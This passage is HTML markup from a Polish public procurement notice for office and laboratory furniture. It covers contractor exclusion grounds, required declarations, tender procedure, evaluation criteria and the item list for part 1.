<div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:2.	Nie podlegają wykluczeniu z postępowania w okolicznościach, o których mowa w art. 24 ust. 1 pkt 12-23 oraz ust. 5 ustawy Pzp:1)	w stosunku do którego otwarto likwidację, w zatwierdzonym przez sąd układzie w postępowaniu restrukturyzacyjnym jest przewidziane zaspokojenie wierzycieli przez likwidację jego majątku lub sąd zarządził likwidację jego majątku w trybie art. 332 ust. 1 ustawy z dnia 15 maja 2015 r. - Prawo restrukturyzacyjne (Dz. U. z 2015 r. poz. 978, 1259, 1513, 1830 i 1844 oraz z 2016 r. po z. 615) lub którego upadłość ogłoszono, z wyjątkiem Wykonawcy, który po ogłoszeniu upadłości zawarł układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli przez likwidację majątku upadłego, chyba że sąd zarządził likwidację jego majątku w trybie art. 366 ust. 1 ustawy z dnia 28 lutego 2003 r. - Prawo upadłościowe (Dz. U. z 2015 r. poz. 233, 978, 1166, 1259 i 1844 oraz z 2016r. poz. 615);2)	który, z przyczyn leżących po jego stronie, nie wykonał albo nienależycie wykonał w istotnym stopniu wcześniejszą umowę w sprawie zamówienia publicznego lub umowę koncesji, zawartą z zamawiającym, o którym mowa w art. 3 ust. 1 pkt 1 - 4 ustawy Pzp, co doprowadziło do rozwiązania umowy lub zasądzenia odszkodowania;3.	Żaden z Wykonawców występujących wspólnie nie może podlegać wykluczeniu na podstawie art. 24 ustawy Pzp.1.	W celu wstępnego potwierdzenia spełniania warunków udziału w postepowaniu oraz braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego Wykonawca dołączy do oferty, aktualne na dzień składania ofert oświadczenie, o którym mowa w art. 25a ust. 1 ustawy Pzp, w formie:Oświadczenie Wykonawcy o braku podstaw do wykluczenia oraz o spełnianiu warunków udziału w postępowaniu (Załącznik nr 4 do SIWZ)W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie (Załącznik nr 4 do SIWZ) składa każdy z Wykonawców, wspólnie ubiegających się o zamówienie. Dokument ten ma potwierdzać spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia.2.	Zamawiający przed udzieleniem zamówienia wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie aktualnych na dzień złożenia oświadczeń lub dokumentów potwierdzających:2)	brak podstaw do wykluczenia:a)	Wykonawca złoży odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp;3.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów o których mowa w:a)	pkt. 2.2 lit. a) - składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości4.	Dokumenty, o których mowa w pkt 3 powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.5.	Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w pkt 3, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy lub miejsce zamieszkania tej osoby. Zapis pkt 4 stosuje się.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:1.	Spełniają warunki udziału w postępowaniu, zgodnie z art. 22 ust. 1b ustawy Pzp:1)	posiadają zdolności techniczne lub zawodowe. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca:a)	złoży wykaz wykonanych dostaw, a w przypadku świadczenia okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:dla Części 1 zamówienia - co najmniej 1 dostawę mebli biurowych o wartości nie mniejszej niż 40.000,00 zł brutto; dla Części 2 zamówienia - co najmniej 1 dostawę mebli laboratoryjnych o wartości nie mniejszej niż 300.000,00 zł brutto; i przedstawi dokumenty potwierdzające, że zamówienia te zostały wykonane lub są wykonywane należycie (forma referencji). Dokumenty tiret drugiego potwierdzają spełnienie warunku tiret pierwszego.Wzór wykazu dostaw stanowi Załącznik nr 5 do SIWZ.1.	W celu wstępnego potwierdzenia spełniania warunków udziału w postępowaniu oraz braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego Wykonawca dołączy do oferty, aktualne na dzień składania ofert oświadczenie, o którym mowa w art. 25a ust. 1 ustawy Pzp, w formie:Oświadczenie Wykonawcy o braku podstaw do wykluczenia oraz o spełnianiu warunków udziału w postępowaniu (Załącznik nr 4 do SIWZ)W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie (Załącznik nr 4 do SIWZ) składa każdy z Wykonawców, wspólnie ubiegających się o zamówienie. Dokument ten ma potwierdzać spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia.2.	Zamawiający przed udzieleniem zamówienia wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie aktualnych na dzień złożenia oświadczeń lub dokumentów potwierdzających:1)	spełnienie warunków udziału w postępowaniu, określonych w art. 22 ust. 1 ustawy Pzp:a)	Wykonawca złoży wykaz dostaw, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów- oświadczenie Wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>90,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres gwarancji</TD><TD style='border: 1px solid black;border-collapse: collapse;'>10,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zgodnie z przepisem art. 144 ust. 1 ustawy Pzp Strony przewidują możliwość zmiany Umowy, w formie aneksu, w następujących przypadkach i przy zachowaniu następujących warunków:1)	zmiana terminu realizacji przedmiotu umowy - z przyczyn niezależnych od Wykonawcy lub Zamawiającego, których nie można było przewidzieć w momencie przygotowania i prowadzenia postępowania, a także w momencie zawarcia Umowy;2)	zmiana sposobu dokonywania rozliczeń z uwagi na zmiany w powszechnie obowiązujących przepisach prawa;3)	zmiany w wymaganych parametrach produktu w związku z pojawiającymi się rozwojowymi zmianami techniczno-technologicznymi; 4)	inne zmiany wynikające ze zmian powszechnie obowiązujących przepisów prawa.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-01-21</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Przedmiotem zamówienia jest dostawa mebli biurowych wraz z wyposażeniem uzupełniającym do pom. nr 608 i 609</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa mebli biurowych wraz z wyposażeniem uzupełniającym do pom. nr 608 i 609:Lp.	Nazwa przedmiotu	Symbol	Liczba (szt.)	Wymiary (+/- 50mm)1.	Biurko, z tyłu biurka osłona z blachy aluminiowej perforowanej	B1	5	Szerokość: 1600 mmGłębokość: 800 mmWysokość: 750 mm2.	Kontener 4-szufladowy na kółkach, zamek centralny	Bk1	5	Szerokość: 450 mmGłębokość: 500 mmWysokość: 600 mm3.	Stół konferencyjny	S1	1	Szerokość: 1400 mmGłębokość: 700 mmWysokość: 750 mm4.	Szafa ubraniowa	Sz-ub2	2	Szerokość: 800 mmGłębokość: 400 mmWysokość: 1800 mm5.	Szafa zamykana na akta	Sz1	2	Szerokość: 800 mmGłębokość: 400 mmWysokość: 1800 mm6.	Szafa na akta, zamykana dołem, otwarta górą	Sz2	5	Szerokość: 800 mmGłębokość: 400 mmWysokość: 1800 mm7.	Szafa zamykana	Sz4	1	Szerokość: 800 mmGłębokość: 400 mmWysokość: 1500 mm8.	Szafka zamykana	Sz7	4	Szerokość: 800 mmGłębokość: 400 mmWysokość: 750 mm9.	Kosz plastikowy z klapką ruchomą	-	4	Kosz o pojemności 35 l, w kolorze szarymSzczegółowy opis przedmiotu zamówienia stanowi Załącznik nr 1 do SIWZ.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39100000-3, 39130000-2, 39180000-7, 39181000-4, 39111100-4, 39141500-7, 39141500-7<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-03-15<br/><b> 5) Kryteria oceny ofert: 